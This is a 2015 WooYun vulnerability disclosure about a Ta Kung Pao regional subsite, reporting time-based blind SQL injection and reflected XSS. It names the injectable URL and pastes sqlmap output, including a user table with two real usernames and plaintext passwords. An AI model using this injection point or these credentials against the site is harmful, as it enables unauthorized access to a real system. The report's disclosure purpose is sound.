当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128510

漏洞标题:大公网某分站多处漏洞打包(xss/sql)

相关厂商:大公网

漏洞作者: 尊-折戟

提交时间:2015-07-22 23:39

修复时间:2015-09-05 23:40

公开时间:2015-09-05 23:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

关注时事新闻!

详细说明:

首先来第一发:

http://cq.takungpao.com/list.asp?classid=155


基于时间SQL盲注:

AA1L01G78R$1P1B]RPO8C5N.png


[7977)4SAU5X`O`]BWYS(SK.jpg


sqlmap跑下

$$MA4V$QT)KAA73)MP1TL~D.png


Database: Microsoft_Access_masterdb
[1 table]
+----------+
| tbl_user |
+----------+


最近网速不好,我就列了下重要的数据。

`7`@GEIV8BL52AVNAGS6UQT.png


这网速我也是醉了,实在受不鸟。
好吧,我就列了最后的。唔

Database: Microsoft_Access_masterdb
Table: tbl_user
[2 entries]
+--------+------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
-------------------------------------------------------------------+----------+---------+
| userid | access
| username | userpwd |
+--------+------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
-------------------------------------------------------------------+----------+---------+
| 1 | 134, 135, 75, 270, 88, 22, 153, 155, 159, 157, 161, 259, 124, 268, 266, 56, 136, 50, 154,
156, 158, 160, 162, 122, 78, 264, 121, 71, 76, 258, 293, 294, 295, 296, 297, 269, 54, 51, 260, 261,
262, 263, 89, 146, 171, 172, 173, 271, 236, 237, 238, 239, 240, 2 | cq | 123654 |
| 2 | 75, 88, 22, 155, 159, 157, 161, 259, 124, 268, 266, 56, 136, 50, 122, 78, 264, 121, 71, 7
6, 258, 269, 54, 51, 260, 261, 262, 263, 256, 257, 146, 32, 25, 139
| hy | hy |
+--------+------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------


就跑了这一点点。
第二发:XSS漏洞(反射型)

(`6%%L06WB}YVAP~A][$LVN.jpg

(UQ98QT7@PNN5M`S3U~IV0N.jpg


漏洞证明:

Database: Microsoft_Access_masterdb
[1 table]
+----------+
| tbl_user |
+----------+


最近网速不好,我就列了下重要的数据。

`7`@GEIV8BL52AVNAGS6UQT.png


B5TQD@K$U)]RG6%VNI0OBL3.png


R2ASU7NN%1CI(P@VA136HLY.png

修复方案:

严格控制关键字。安全狗拦截

版权声明:转载请注明来源 尊-折戟@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评论